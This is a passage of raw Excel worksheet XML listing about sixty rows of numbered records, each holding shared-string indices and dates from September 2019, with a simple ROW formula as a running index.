      <c r="E5132" t="s">
        <v>10233</v>
      </c>
      <c r="F5132" t="s">
        <v>9975</v>
      </c>
      <c r="G5132" t="s">
        <v>10234</v>
      </c>
    </row>
    <row r="5133" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5133">
        <f t="shared" si="80"/>
        <v>5132</v>
      </c>
      <c r="B5133">
        <v>132</v>
      </c>
      <c r="C5133" t="s">
        <v>9973</v>
      </c>
      <c r="D5133" s="1">
        <v>43731</v>
      </c>
      <c r="E5133" t="s">
        <v>10235</v>
      </c>
      <c r="F5133" t="s">
        <v>9975</v>
      </c>
      <c r="G5133" t="s">
        <v>10236</v>
      </c>
    </row>
    <row r="5134" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5134">
        <f t="shared" si="80"/>
        <v>5133</v>
      </c>
      <c r="B5134">
        <v>133</v>
      </c>
      <c r="C5134" t="s">
        <v>9973</v>
      </c>
      <c r="D5134" s="1">
        <v>43735</v>
      </c>
      <c r="E5134" t="s">
        <v>10237</v>
      </c>
      <c r="F5134" t="s">
        <v>9975</v>
      </c>
      <c r="G5134" t="s">
        <v>10238</v>
      </c>
    </row>
    <row r="5135" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5135">
        <f t="shared" si="80"/>
        <v>5134</v>
      </c>
      <c r="B5135">
        <v>134</v>
      </c>
      <c r="C5135" t="s">
        <v>9973</v>
      </c>
      <c r="D5135" s="1">
        <v>43735</v>
      </c>
      <c r="E5135" t="s">
        <v>10239</v>
      </c>
      <c r="F5135" t="s">
        <v>9975</v>
      </c>
      <c r="G5135" t="s">
        <v>10240</v>
      </c>
    </row>
    <row r="5136" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5136">
        <f t="shared" si="80"/>
        <v>5135</v>
      </c>
      <c r="B5136">
        <v>135</v>
      </c>
      <c r="C5136" t="s">
        <v>9973</v>
      </c>
      <c r="D5136" s="1">
        <v>43729</v>
      </c>
      <c r="E5136" t="s">
        <v>10241</v>
      </c>
      <c r="F5136" t="s">
        <v>9975</v>
      </c>
      <c r="G5136" t="s">
        <v>10242</v>
      </c>
    </row>
    <row r="5137" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5137">
        <f t="shared" si="80"/>
        <v>5136</v>
      </c>
      <c r="B5137">
        <v>136</v>
      </c>
      <c r="C5137" t="s">
        <v>9973</v>
      </c>
      <c r="D5137" s="1">
        <v>43717</v>
      </c>
      <c r="E5137" t="s">
        <v>10243</v>
      </c>
      <c r="F5137" t="s">
        <v>9975</v>
      </c>
      <c r="G5137" t="s">
        <v>10244</v>
      </c>
    </row>
    <row r="5138" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5138">
        <f t="shared" si="80"/>
        <v>5137</v>
      </c>
      <c r="B5138">
        <v>137</v>
      </c>
      <c r="C5138" t="s">
        <v>9973</v>
      </c>
      <c r="D5138" s="1">
        <v>43724</v>
      </c>
      <c r="E5138" t="s">
        <v>10245</v>
      </c>
      <c r="F5138" t="s">
        <v>9975</v>
      </c>
      <c r="G5138" t="s">
        <v>10246</v>
      </c>
    </row>
    <row r="5139" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5139">
        <f t="shared" si="80"/>
        <v>5138</v>
      </c>
      <c r="B5139">
        <v>138</v>
      </c>
      <c r="C5139" t="s">
        <v>9973</v>
      </c>
      <c r="D5139" s="1">
        <v>43716</v>
      </c>
      <c r="E5139" t="s">
        <v>10247</v>
      </c>
      <c r="F5139" t="s">
        <v>10021</v>
      </c>
      <c r="G5139" t="s">
        <v>10248</v>
      </c>
    </row>
    <row r="5140" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5140">
        <f t="shared" si="80"/>
        <v>5139</v>
      </c>
      <c r="B5140">
        <v>139</v>
      </c>
      <c r="C5140" t="s">
        <v>9973</v>
      </c>
      <c r="D5140" s="1">
        <v>43719</v>
      </c>
      <c r="E5140" t="s">
        <v>10249</v>
      </c>
      <c r="F5140" t="s">
        <v>9975</v>
      </c>
      <c r="G5140" t="s">
        <v>10250</v>
      </c>
    </row>
    <row r="5141" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5141">
        <f t="shared" si="80"/>
        <v>5140</v>
      </c>
      <c r="B5141">
        <v>140</v>
      </c>
      <c r="C5141" t="s">
        <v>9973</v>
      </c>
      <c r="D5141" s="1">
        <v>43713</v>
      </c>
      <c r="E5141" t="s">
        <v>10251</v>
      </c>
      <c r="F5141" t="s">
        <v>9975</v>
      </c>
      <c r="G5141" t="s">
        <v>10252</v>
      </c>
    </row>
    <row r="5142" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5142">
        <f t="shared" si="80"/>
        <v>5141</v>
      </c>
      <c r="B5142">
        <v>141</v>
      </c>
      <c r="C5142" t="s">
        <v>9973</v>
      </c>
      <c r="D5142" s="1">
        <v>43718</v>
      </c>
      <c r="E5142" t="s">
        <v>10253</v>
      </c>
      <c r="F5142" t="s">
        <v>9975</v>
      </c>
      <c r="G5142" t="s">
        <v>10254</v>
      </c>
    </row>
    <row r="5143" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5143">
        <f t="shared" si="80"/>
        <v>5142</v>
      </c>
      <c r="B5143">
        <v>142</v>
      </c>
      <c r="C5143" t="s">
        <v>9973</v>
      </c>
      <c r="D5143" s="1">
        <v>43719</v>
      </c>
      <c r="E5143" t="s">
        <v>10255</v>
      </c>
      <c r="F5143" t="s">
        <v>9975</v>
      </c>
      <c r="G5143" t="s">
        <v>10256</v>
      </c>
    </row>
    <row r="5144" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5144">
        <f t="shared" si="80"/>
        <v>5143</v>
      </c>
      <c r="B5144">
        <v>143</v>
      </c>
      <c r="C5144" t="s">
        <v>9973</v>
      </c>
      <c r="D5144" s="1">
        <v>43736</v>
      </c>
      <c r="E5144" t="s">
        <v>10257</v>
      </c>
      <c r="F5144" t="s">
        <v>9975</v>
      </c>
      <c r="G5144" t="s">
        <v>10258</v>
      </c>
    </row>
    <row r="5145" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5145">
        <f t="shared" si="80"/>
        <v>5144</v>
      </c>
      <c r="B5145">
        <v>144</v>
      </c>
      <c r="C5145" t="s">
        <v>9973</v>
      </c>
      <c r="D5145" s="1">
        <v>43726</v>
      </c>
      <c r="E5145" t="s">
        <v>10259</v>
      </c>
      <c r="F5145" t="s">
        <v>9975</v>
      </c>
      <c r="G5145" t="s">
        <v>10260</v>
      </c>
    </row>
    <row r="5146" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5146">
        <f t="shared" si="80"/>
        <v>5145</v>
      </c>
      <c r="B5146">
        <v>145</v>
      </c>
      <c r="C5146" t="s">
        <v>9973</v>
      </c>
      <c r="D5146" s="1">
        <v>43718</v>
      </c>
      <c r="E5146" t="s">
        <v>10261</v>
      </c>
      <c r="F5146" t="s">
        <v>9975</v>
      </c>
      <c r="G5146" t="s">
        <v>10262</v>
      </c>
    </row>
    <row r="5147" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5147">
        <f t="shared" si="80"/>
        <v>5146</v>
      </c>
      <c r="B5147">
        <v>146</v>
      </c>
      <c r="C5147" t="s">
        <v>9973</v>
      </c>
      <c r="D5147" s="1">
        <v>43723</v>
      </c>
      <c r="E5147" t="s">
        <v>10263</v>
      </c>
      <c r="F5147" t="s">
        <v>9975</v>
      </c>
      <c r="G5147" t="s">
        <v>10264</v>
      </c>
    </row>
    <row r="5148" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5148">
        <f t="shared" si="80"/>
        <v>5147</v>
      </c>
      <c r="B5148">
        <v>147</v>
      </c>
      <c r="C5148" t="s">
        <v>9973</v>
      </c>
      <c r="D5148" s="1">
        <v>43712</v>
      </c>
      <c r="E5148" t="s">
        <v>10265</v>
      </c>
      <c r="F5148" t="s">
        <v>9975</v>
      </c>
      <c r="G5148" t="s">
        <v>10266</v>
      </c>
    </row>
    <row r="5149" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5149">
        <f t="shared" si="80"/>
        <v>5148</v>
      </c>
      <c r="B5149">
        <v>148</v>
      </c>
      <c r="C5149" t="s">
        <v>9973</v>
      </c>
      <c r="D5149" s="1">
        <v>43717</v>
      </c>
      <c r="E5149" t="s">
        <v>10267</v>
      </c>
      <c r="F5149" t="s">
        <v>9975</v>
      </c>
      <c r="G5149" t="s">
        <v>10268</v>
      </c>
    </row>
    <row r="5150" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5150">
        <f t="shared" si="80"/>
        <v>5149</v>
      </c>
      <c r="B5150">
        <v>149</v>
      </c>
      <c r="C5150" t="s">
        <v>9973</v>
      </c>
      <c r="D5150" s="1">
        <v>43725</v>
      </c>
      <c r="E5150" t="s">
        <v>10269</v>
      </c>
      <c r="F5150" t="s">
        <v>9975</v>
      </c>
      <c r="G5150" t="s">
        <v>10270</v>
      </c>
    </row>
    <row r="5151" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5151">
        <f t="shared" si="80"/>
        <v>5150</v>
      </c>
      <c r="B5151">
        <v>150</v>
      </c>
      <c r="C5151" t="s">
        <v>9973</v>
      </c>
      <c r="D5151" s="1">
        <v>43734</v>
      </c>
      <c r="E5151" t="s">
        <v>10271</v>
      </c>
      <c r="F5151" t="s">
        <v>9975</v>
      </c>
      <c r="G5151" t="s">
        <v>10272</v>
      </c>
    </row>
    <row r="5152" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5152">
        <f t="shared" si="80"/>
        <v>5151</v>
      </c>
      <c r="B5152">
        <v>151</v>
      </c>
      <c r="C5152" t="s">
        <v>9973</v>
      </c>
      <c r="D5152" s="1">
        <v>43731</v>
      </c>
      <c r="E5152" t="s">
        <v>10273</v>
      </c>
      <c r="F5152" t="s">
        <v>9975</v>
      </c>
      <c r="G5152" t="s">
        <v>10274</v>
      </c>
    </row>
    <row r="5153" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5153">
        <f t="shared" si="80"/>
        <v>5152</v>
      </c>
      <c r="B5153">
        <v>152</v>
      </c>
      <c r="C5153" t="s">
        <v>9973</v>
      </c>
      <c r="D5153" s="1">
        <v>43733</v>
      </c>
      <c r="E5153" t="s">
        <v>10275</v>
      </c>
      <c r="F5153" t="s">
        <v>9975</v>
      </c>
      <c r="G5153" t="s">
        <v>10276</v>
      </c>
    </row>
    <row r="5154" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5154">
        <f t="shared" si="80"/>
        <v>5153</v>
      </c>
      <c r="B5154">
        <v>153</v>
      </c>
      <c r="C5154" t="s">
        <v>9973</v>
      </c>
      <c r="D5154" s="1">
        <v>43712</v>
      </c>
      <c r="E5154" t="s">
        <v>10277</v>
      </c>
      <c r="F5154" t="s">
        <v>9975</v>
      </c>
      <c r="G5154" t="s">
        <v>10278</v>
      </c>
    </row>
    <row r="5155" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5155">
        <f t="shared" si="80"/>
        <v>5154</v>
      </c>
      <c r="B5155">
        <v>154</v>
      </c>
      <c r="C5155" t="s">
        <v>9973</v>
      </c>
      <c r="D5155" s="1">
        <v>43717</v>
      </c>
      <c r="E5155" t="s">
        <v>10279</v>
      </c>
      <c r="F5155" t="s">
        <v>9975</v>
      </c>
      <c r="G5155" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="5156" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5156">
        <f t="shared" si="80"/>
        <v>5155</v>
      </c>
      <c r="B5156">
        <v>155</v>
      </c>
      <c r="C5156" t="s">
        <v>9973</v>
      </c>
      <c r="D5156" s="1">
        <v>43721</v>
      </c>
      <c r="E5156" t="s">
        <v>10281</v>
      </c>
      <c r="F5156" t="s">
        <v>9975</v>
      </c>
      <c r="G5156" t="s">
        <v>10282</v>
      </c>
    </row>
    <row r="5157" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5157">
        <f t="shared" si="80"/>
        <v>5156</v>
      </c>
      <c r="B5157">
        <v>156</v>
      </c>
      <c r="C5157" t="s">
        <v>9973</v>
      </c>
      <c r="D5157" s="1">
        <v>43728</v>
      </c>
      <c r="E5157" t="s">
        <v>10283</v>
      </c>
      <c r="F5157" t="s">
        <v>9975</v>
      </c>
      <c r="G5157" t="s">
        <v>10284</v>
      </c>
    </row>
    <row r="5158" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5158">
        <f t="shared" si="80"/>
        <v>5157</v>
      </c>
      <c r="B5158">
        <v>157</v>
      </c>
      <c r="C5158" t="s">
        <v>9973</v>
      </c>
      <c r="D5158" s="1">
        <v>43733</v>
      </c>
      <c r="E5158" t="s">
        <v>10285</v>
      </c>
      <c r="F5158" t="s">
        <v>9975</v>
      </c>
      <c r="G5158" t="s">
        <v>10286</v>
      </c>
    </row>
    <row r="5159" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5159">
        <f t="shared" si="80"/>
        <v>5158</v>
      </c>
      <c r="B5159">
        <v>158</v>
      </c>
      <c r="C5159" t="s">
        <v>9973</v>
      </c>
      <c r="D5159" s="1">
        <v>43721</v>
      </c>
      <c r="E5159" t="s">
        <v>10287</v>
      </c>
      <c r="F5159" t="s">
        <v>9975</v>
      </c>
      <c r="G5159" t="s">
        <v>10288</v>
      </c>
    </row>
    <row r="5160" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5160">
        <f t="shared" si="80"/>
        <v>5159</v>
      </c>
      <c r="B5160">
        <v>159</v>
      </c>
      <c r="C5160" t="s">
        <v>9973</v>
      </c>
      <c r="D5160" s="1">
        <v>43738</v>
      </c>
      <c r="E5160" t="s">
        <v>10289</v>
      </c>
      <c r="F5160" t="s">
        <v>9975</v>
      </c>
      <c r="G5160" t="s">
        <v>10290</v>
      </c>
    </row>
    <row r="5161" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5161">
        <f t="shared" si="80"/>
        <v>5160</v>
      </c>
      <c r="B5161">
        <v>160</v>
      </c>
      <c r="C5161" t="s">
        <v>9973</v>
      </c>
      <c r="D5161" s="1">
        <v>43710</v>
      </c>
      <c r="E5161" t="s">
        <v>10291</v>
      </c>
      <c r="F5161" t="s">
        <v>9975</v>
      </c>
      <c r="G5161" t="s">
        <v>10292</v>
      </c>
    </row>
    <row r="5162" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5162">
        <f t="shared" si="80"/>
        <v>5161</v>
      </c>
      <c r="B5162">
        <v>161</v>
      </c>
      <c r="C5162" t="s">
        <v>9973</v>
      </c>
      <c r="D5162" s="1">
        <v>43711</v>
      </c>
      <c r="E5162" t="s">
        <v>10293</v>
      </c>
      <c r="F5162" t="s">
        <v>9975</v>
      </c>
      <c r="G5162" t="s">
        <v>10294</v>
      </c>
    </row>
    <row r="5163" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5163">
        <f t="shared" si="80"/>
        <v>5162</v>
      </c>
      <c r="B5163">
        <v>162</v>
      </c>
      <c r="C5163" t="s">
        <v>9973</v>
      </c>
      <c r="D5163" s="1">
        <v>43715</v>
      </c>
      <c r="E5163" t="s">
        <v>10295</v>
      </c>
      <c r="F5163" t="s">
        <v>9975</v>
      </c>
      <c r="G5163" t="s">
        <v>10296</v>
      </c>
    </row>
    <row r="5164" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5164">
        <f t="shared" si="80"/>
        <v>5163</v>
      </c>
      <c r="B5164">
        <v>163</v>
      </c>
      <c r="C5164" t="s">
        <v>9973</v>
      </c>
      <c r="D5164" s="1">
        <v>43726</v>
      </c>
      <c r="E5164" t="s">
        <v>10099</v>
      </c>
      <c r="F5164" t="s">
        <v>9975</v>
      </c>
      <c r="G5164" t="s">
        <v>10297</v>
      </c>
    </row>
    <row r="5165" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5165">
        <f t="shared" si="80"/>
        <v>5164</v>
      </c>
      <c r="B5165">
        <v>164</v>
      </c>
      <c r="C5165" t="s">
        <v>9973</v>
      </c>
      <c r="D5165" s="1">
        <v>43734</v>
      </c>
      <c r="E5165" t="s">
        <v>10298</v>
      </c>
      <c r="F5165" t="s">
        <v>9975</v>
      </c>
      <c r="G5165" t="s">
        <v>10299</v>
      </c>
    </row>
    <row r="5166" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5166">
        <f t="shared" si="80"/>
        <v>5165</v>
      </c>
      <c r="B5166">
        <v>165</v>
      </c>
      <c r="C5166" t="s">
        <v>9973</v>
      </c>
      <c r="D5166" s="1">
        <v>43726</v>
      </c>
      <c r="E5166" t="s">
        <v>10300</v>
      </c>
      <c r="F5166" t="s">
        <v>9975</v>
      </c>
      <c r="G5166" t="s">
        <v>10301</v>
      </c>
    </row>
    <row r="5167" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5167">
        <f t="shared" si="80"/>
        <v>5166</v>
      </c>
      <c r="B5167">
        <v>166</v>
      </c>
      <c r="C5167" t="s">
        <v>9973</v>
      </c>
      <c r="D5167" s="1">
        <v>43718</v>
      </c>
      <c r="E5167" t="s">
        <v>10302</v>
      </c>
      <c r="F5167" t="s">
        <v>9975</v>
      </c>
      <c r="G5167" t="s">
        <v>10303</v>
      </c>
    </row>
    <row r="5168" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5168">
        <f t="shared" si="80"/>
        <v>5167</v>
      </c>
      <c r="B5168">
        <v>167</v>
      </c>
      <c r="C5168" t="s">
        <v>9973</v>
      </c>
      <c r="D5168" s="1">
        <v>43712</v>
      </c>
      <c r="E5168" t="s">
        <v>10304</v>
      </c>
      <c r="F5168" t="s">
        <v>9975</v>
      </c>
      <c r="G5168" t="s">
        <v>10305</v>
      </c>
    </row>
    <row r="5169" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5169">
        <f t="shared" si="80"/>
        <v>5168</v>
      </c>
      <c r="B5169">
        <v>168</v>
      </c>
      <c r="C5169" t="s">
        <v>9973</v>
      </c>
      <c r="D5169" s="1">
        <v>43728</v>
      </c>
      <c r="E5169" t="s">
        <v>10306</v>
      </c>
      <c r="F5169" t="s">
        <v>9975</v>
      </c>
      <c r="G5169" t="s">
        <v>10307</v>
      </c>
    </row>
    <row r="5170" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5170">
        <f t="shared" si="80"/>
        <v>5169</v>
      </c>
      <c r="B5170">
        <v>169</v>
      </c>
      <c r="C5170" t="s">
        <v>9973</v>
      </c>
      <c r="D5170" s="1">
        <v>43738</v>
      </c>
      <c r="E5170" t="s">
        <v>10308</v>
      </c>
      <c r="F5170" t="s">
        <v>9975</v>
      </c>
      <c r="G5170" t="s">
        <v>10309</v>
      </c>
    </row>
    <row r="5171" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5171">
        <f t="shared" si="80"/>
        <v>5170</v>
      </c>
      <c r="B5171">
        <v>170</v>
      </c>
      <c r="C5171" t="s">
        <v>9973</v>
      </c>
      <c r="D5171" s="1">
        <v>43719</v>
      </c>
      <c r="E5171" t="s">
        <v>10310</v>
      </c>
      <c r="F5171" t="s">
        <v>9975</v>
      </c>
      <c r="G5171" t="s">
        <v>10311</v>
      </c>
    </row>
    <row r="5172" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5172">
        <f t="shared" si="80"/>
        <v>5171</v>
      </c>
      <c r="B5172">
        <v>171</v>
      </c>
      <c r="C5172" t="s">
        <v>9973</v>
      </c>
      <c r="D5172" s="1">
        <v>43724</v>
      </c>
      <c r="E5172" t="s">
        <v>10312</v>
      </c>
      <c r="F5172" t="s">
        <v>9975</v>
      </c>
      <c r="G5172" t="s">
        <v>10313</v>
      </c>
    </row>
    <row r="5173" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5173">
        <f t="shared" si="80"/>
        <v>5172</v>
      </c>
      <c r="B5173">
        <v>172</v>
      </c>
      <c r="C5173" t="s">
        <v>9973</v>
      </c>
      <c r="D5173" s="1">
        <v>43733</v>
      </c>
      <c r="E5173" t="s">
        <v>10314</v>
      </c>
      <c r="F5173" t="s">
        <v>9975</v>
      </c>
      <c r="G5173" t="s">
        <v>10315</v>
      </c>
    </row>
    <row r="5174" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5174">
        <f t="shared" si="80"/>
        <v>5173</v>
      </c>
      <c r="B5174">
        <v>173</v>
      </c>
      <c r="C5174" t="s">
        <v>9973</v>
      </c>
      <c r="D5174" s="1">
        <v>43714</v>
      </c>
      <c r="E5174" t="s">
        <v>10316</v>
      </c>
      <c r="F5174" t="s">
        <v>9975</v>
      </c>
      <c r="G5174" t="s">
        <v>10317</v>
      </c>
    </row>
    <row r="5175" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5175">
        <f t="shared" si="80"/>
        <v>5174</v>
      </c>
      <c r="B5175">
        <v>174</v>
      </c>
      <c r="C5175" t="s">
        <v>9973</v>
      </c>
      <c r="D5175" s="1">
        <v>43738</v>
      </c>
      <c r="E5175" t="s">
        <v>10318</v>
      </c>
      <c r="F5175" t="s">
        <v>9975</v>
      </c>
      <c r="G5175" t="s">
        <v>10319</v>
      </c>
    </row>
    <row r="5176" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5176">
        <f t="shared" si="80"/>
        <v>5175</v>
      </c>
      <c r="B5176">
        <v>175</v>
      </c>
      <c r="C5176" t="s">
        <v>9973</v>
      </c>
      <c r="D5176" s="1">
        <v>43731</v>
      </c>
      <c r="E5176" t="s">
        <v>10320</v>
      </c>
      <c r="F5176" t="s">
        <v>9975</v>
      </c>
      <c r="G5176" t="s">
        <v>10321</v>
      </c>
    </row>
    <row r="5177" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5177">
        <f t="shared" si="80"/>
        <v>5176</v>
      </c>
      <c r="B5177">
        <v>176</v>
      </c>
      <c r="C5177" t="s">
        <v>9973</v>
      </c>
      <c r="D5177" s="1">
        <v>43721</v>
      </c>
      <c r="E5177" t="s">
        <v>10322</v>
      </c>
      <c r="F5177" t="s">
        <v>9975</v>
      </c>
      <c r="G5177" t="s">
        <v>10323</v>
      </c>
    </row>
    <row r="5178" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5178">
        <f t="shared" si="80"/>
        <v>5177</v>
      </c>
      <c r="B5178">
        <v>177</v>
      </c>
      <c r="C5178" t="s">
        <v>9973</v>
      </c>
      <c r="D5178" s="1">
        <v>43718</v>
      </c>
      <c r="E5178" t="s">
        <v>10099</v>
      </c>
      <c r="F5178" t="s">
        <v>9975</v>
      </c>
      <c r="G5178" t="s">
        <v>10324</v>
      </c>
    </row>
    <row r="5179" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5179">
        <f t="shared" si="80"/>
        <v>5178</v>
      </c>
      <c r="B5179">
        <v>178</v>
      </c>
      <c r="C5179" t="s">
        <v>9973</v>
      </c>
      <c r="D5179" s="1">
        <v>43716</v>
      </c>
      <c r="E5179" t="s">
        <v>10099</v>
      </c>
      <c r="F5179" t="s">
        <v>9975</v>
      </c>
      <c r="G5179" t="s">
        <v>10325</v>
      </c>
    </row>
    <row r="5180" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5180">
        <f t="shared" si="80"/>
        <v>5179</v>
      </c>
      <c r="B5180">
        <v>179</v>
      </c>
      <c r="C5180" t="s">
        <v>9973</v>
      </c>
      <c r="D5180" s="1">
        <v>43710</v>
      </c>
      <c r="E5180" t="s">
        <v>10326</v>
      </c>
      <c r="F5180" t="s">
        <v>9975</v>
      </c>
      <c r="G5180" t="s">
        <v>10327</v>
      </c>
    </row>
    <row r="5181" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5181">
        <f t="shared" si="80"/>
        <v>5180</v>
      </c>
      <c r="B5181">
        <v>180</v>
      </c>
      <c r="C5181" t="s">
        <v>9973</v>
      </c>
      <c r="D5181" s="1">
        <v>43726</v>
      </c>
      <c r="E5181" t="s">
        <v>10328</v>
      </c>
      <c r="F5181" t="s">
        <v>9975</v>
      </c>
      <c r="G5181" t="s">
        <v>10329</v>
      </c>
    </row>
    <row r="5182" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5182">
        <f t="shared" si="80"/>
        <v>5181</v>
      </c>
      <c r="B5182">
        <v>181</v>
      </c>
      <c r="C5182" t="s">
        <v>9973</v>
      </c>
      <c r="D5182" s="1">
        <v>43721</v>
      </c>
      <c r="E5182" t="s">
        <v>10330</v>
      </c>
      <c r="F5182" t="s">
        <v>9975</v>
      </c>
      <c r="G5182" t="s">
        <v>10331</v>
      </c>
    </row>
    <row r="5183" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5183">
        <f t="shared" si="80"/>
        <v>5182</v>
      </c>
      <c r="B5183">
        <v>182</v>
      </c>
      <c r="C5183" t="s">
        <v>9973</v>
      </c>
      <c r="D5183" s="1">
        <v>43710</v>
      </c>
      <c r="E5183" t="s">
        <v>10332</v>
      </c>
      <c r="F5183" t="s">
        <v>9975</v>
      </c>
      <c r="G5183" t="s">
        <v>10333</v>
      </c>
    </row>
    <row r="5184" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5184">
        <f t="shared" si="80"/>
        <v>5183</v>
      </c>
      <c r="B5184">
        <v>183</v>
      </c>
      <c r="C5184" t="s">
        <v>9973</v>
      </c>
      <c r="D5184" s="1">
        <v>43722</v>
      </c>
      <c r="E5184" t="s">
        <v>10334</v>
      </c>
      <c r="F5184" t="s">
        <v>9975</v>
      </c>
      <c r="G5184" t="s">
        <v>10335</v>
      </c>
    </row>
    <row r="5185" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5185">
        <f t="shared" si="80"/>
        <v>5184</v>
      </c>
      <c r="B5185">
        <v>184</v>
      </c>
      <c r="C5185" t="s">
        <v>9973</v>
      </c>
      <c r="D5185" s="1">
        <v>43716</v>
      </c>
      <c r="E5185" t="s">
        <v>10336</v>
      </c>
      <c r="F5185" t="s">
        <v>9975</v>
      </c>
      <c r="G5185" t="s">
        <v>10337</v>
      </c>
    </row>
    <row r="5186" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5186">
        <f t="shared" si="80"/>
        <v>5185</v>
      </c>
      <c r="B5186">
        <v>185</v>
      </c>
      <c r="C5186" t="s">
        <v>9973</v>
      </c>
      <c r="D5186" s="1">
        <v>43734</v>
      </c>
      <c r="E5186" t="s">
        <v>10338</v>
      </c>
      <c r="F5186" t="s">
        <v>9975</v>
      </c>
      <c r="G5186" t="s">
        <v>10339</v>
      </c>
    </row>
    <row r="5187" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5187">
        <f t="shared" ref="A5187:A5250" si="81">+ROW(A5186)</f>
        <v>5186</v>
      </c>
      <c r="B5187">
        <v>186</v>
      </c>
      <c r="C5187" t="s">
        <v>9973</v>
      </c>
      <c r="D5187" s="1">
        <v>43731</v>
      </c>
      <c r="E5187" t="s">
        <v>10340</v>
      </c>
      <c r="F5187" t="s">
        <v>10021</v>
      </c>
      <c r="G5187" t="s">
        <v>10341</v>
      </c>
    </row>
    <row r="5188" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5188">
        <f t="shared" si="81"/>
        <v>5187</v>
      </c>
      <c r="B5188">
        <v>187</v>
      </c>
      <c r="C5188" t="s">
        <v>9973</v>
      </c>
      <c r="D5188" s="1">
        <v>43726</v>
      </c>
      <c r="E5188" t="s">
        <v>10342</v>
      </c>
      <c r="F5188" t="s">
        <v>9975</v>
      </c>
      <c r="G5188" t="s">
        <v>10343</v>
      </c>
    </row>
    <row r="5189" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5189">
        <f t="shared" si="81"/>
        <v>5188</v>
      </c>
      <c r="B5189">
        <v>188</v>
      </c>
      <c r="C5189" t="s">
        <v>9973</v>
      </c>
      <c r="D5189" s="1">
        <v>43727</v>
      </c>
      <c r="E5189" t="s">
        <v>10018</v>
      </c>
      <c r="F5189" t="s">
        <v>9975</v>
      </c>
      <c r="G5189" t="s">
        <v>10344</v>
      </c>
    </row>
    <row r="5190" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5190">
        <f t="shared" si="81"/>
        <v>5189</v>
      </c>
      <c r="B5190">
        <v>189</v>
      </c>
      <c r="C5190" t="s">
        <v>9973</v>
      </c>
      <c r="D5190" s="1">
        <v>43730</v>
      </c>
      <c r="E5190" t="s">
        <v>10345</v>
      </c>
      <c r="F5190" t="s">
        <v>9975</v>
      </c>
      <c r="G5190" t="s">
        <v>10346</v>
      </c>
    </row>
    <row r="5191" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5191">
        <f t="shared" si="81"/>
        <v>5190</v>
      </c>
      <c r="B5191">
        <v>190</v>
      </c>
      <c r="C5191" t="s">
        <v>9973</v>
      </c>
      <c r="D5191" s="1">
        <v>43713</v>
      </c>
      <c r="E5191" t="s">
        <v>10347</v>
      </c>
      <c r="F5191" t="s">
        <v>9975</v>
      </c>
      <c r="G5191" t="s">
        <v>10348</v>
      </c>
    </row>
    <row r="5192" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5192">
        <f t="shared" si="81"/>
        <v>5191</v>
      </c>
      <c r="B5192">
        <v>191</v>
      </c>
      <c r="C5192" t="s">
        <v>9973</v>
      </c>
      <c r="D5192" s="1">
        <v>43713</v>
      </c>
      <c r="E5192" t="s">
        <v>10349</v>
      </c>
      <c r="F5192" t="s">
        <v>9975</v>
      </c>
      <c r="G5192" t="s">
        <v>10350</v>
      </c>
    </row>
    <row r="5193" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5193">
        <f t="shared" si="81"/>
        <v>5192</v>
      </c>
      <c r="B5193">
        <v>192</v>
      </c>
      <c r="C5193" t="s">
        <v>9973</v>
      </c>
      <c r="D5193" s="1">
        <v>43712</v>
      </c>
      <c r="E5193" t="s">
        <v>10351</v>
      </c>
